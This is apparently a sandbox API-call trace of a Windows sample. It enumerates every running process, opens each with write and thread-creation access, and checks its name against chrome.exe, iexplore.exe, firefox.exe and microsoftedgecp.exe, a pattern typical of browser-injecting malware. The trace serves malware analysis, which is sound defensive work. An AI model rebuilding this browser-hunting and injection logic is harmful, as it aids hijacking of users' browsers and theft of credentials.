	[0256.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.594] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.594] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0256.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.595] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.595] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0256.596] CloseHandle (hObject=0x4fd0) returned 1
	[0256.596] Sleep (dwMilliseconds=0x64) 
	[0256.710] GetCurrentProcessId () returned 0x110
	[0256.710] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0256.713] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0256.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0256.715] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0256.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xb384
	[0256.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.716] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0256.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.716] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.717] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0256.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.717] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.717] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0256.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xb388
	[0256.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.718] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0256.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.719] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.719] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0256.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.720] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.720] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0256.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xb38c
	[0256.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.721] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0256.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.721] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.722] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0256.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.722] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.723] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0256.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xb390
	[0256.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.724] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0256.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.724] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.724] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0256.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.724] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.725] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0256.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xb394
	[0256.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.726] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0256.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.726] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.726] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0256.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.727] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.727] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0256.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xb398
	[0256.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.728] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0256.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.728] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.729] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0256.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.729] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.729] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0256.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xb39c
	[0256.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.731] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0256.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.731] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.731] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0256.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.732] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.732] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0256.733] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xb3a0
	[0256.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.733] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0256.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.733] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.733] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0256.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.733] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.734] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xb3a4
	[0256.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.735] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.735] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.735] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.736] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.736] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xb3a8
	[0256.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.737] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.737] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.737] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.738] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.738] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xb3ac
	[0256.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.739] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.739] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.739] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.740] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.740] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xb3b0
	[0256.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.741] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.741] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.742] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.742] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.742] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xb3b4
	[0256.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.743] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.743] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.744] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.744] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.744] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xb3b8
	[0256.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.745] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.746] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.746] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.747] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.747] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.748] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xb3bc
	[0256.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.748] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.748] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.749] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.749] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.749] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0256.750] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb3c0
	[0256.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.751] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0256.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.751] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.752] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0256.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.752] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.752] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.753] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xb3c4
	[0256.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.753] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.754] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.754] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.754] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.755] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0256.755] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xb3c8
	[0256.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.756] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.756] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.756] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.757] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.757] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0256.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xb3cc
	[0256.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.758] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0256.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.758] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.758] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0256.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.759] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.759] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xb3d0
	[0256.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.760] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.760] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.760] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.761] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.762] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0256.762] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xb3d4
	[0256.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.763] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0256.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.763] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.763] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0256.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.764] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0256.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xb3d8
	[0256.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.765] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0256.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.765] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.765] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0256.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.766] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.766] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0256.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xb3dc
	[0256.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.767] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0256.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.767] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.767] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0256.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.768] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.768] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0256.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xb3e0
